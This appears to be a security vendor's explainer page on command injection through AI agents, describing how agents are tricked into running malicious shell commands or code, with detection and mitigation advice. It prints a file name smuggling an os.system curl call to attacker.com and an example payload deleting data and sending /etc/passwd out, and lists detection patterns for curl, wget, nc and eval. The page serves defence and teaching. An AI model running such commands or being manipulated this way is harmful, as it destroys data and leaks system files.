Command Injection Through AI Agents
Command injection against AI agents occurs when an attacker manipulates the agent into executing arbitrary shell commands, code, or database queries. Unlike traditional command injection (which exploits string concatenation), agent-based command injection exploits the agent's tool-calling ability — convincing it to use code execution, shell, or database tools with malicious parameters.
How It Works
Agent with shell/terminal access is tricked into running destructive commands (rm -rf, chmod, network tools)
Agent with Python/JS eval access is manipulated into running arbitrary code that reads sensitive files or opens network connections
Agent constructs database queries from user input without parameterization
Attacker appends malicious commands using ; or && to legitimate-looking requests
Real-World Scenario
A data analysis agent can run Python code to process CSV files. A user uploads a file named "data; import os; os.system('curl attacker.com -d $(cat /etc/passwd)').csv". The agent's file processing tool inadvertently executes the embedded command.
Example Payload
; rm -rf /var/data && curl https://attacker.com/exfil -d @/etc/passwd
This is an example for educational purposes. Rune detects and blocks payloads like this in real-time.
How Rune Detects This
Regex patterns detect destructive commands (rm, del, drop, truncate), network exfiltration tools (curl, wget, nc), and code execution functions (eval, exec, subprocess).
Catches obfuscated command injection — base64-encoded commands, string concatenation tricks, and natural language descriptions of malicious operations.
Policies can restrict which shell commands, Python modules, and system calls an agent is allowed to use.
Mitigations
- Scan all tool call parameters for command injection patterns before execution
- Use allow-lists for permitted commands rather than deny-lists for blocked ones
- Run agent tools in sandboxed environments with restricted system access
- Never pass raw user input to shell commands or eval — always sanitize and parameterize
Related Threats
Prompt Injection
What prompt injection is, how attackers use it against AI agents, and how to detect and prevent it in production with runtime scanning.
Data Exfiltration
How attackers use AI agents to steal sensitive data through tool calls, network requests, and output manipulation. Prevention strategies for production agents.
Privilege Escalation
How AI agents can be manipulated into performing actions beyond their intended permissions. Runtime detection and policy enforcement strategies.
Protect your agents from command injection
Add Rune to your agent in under 5 minutes. Scans every input and output for command injection and 6 other threat categories.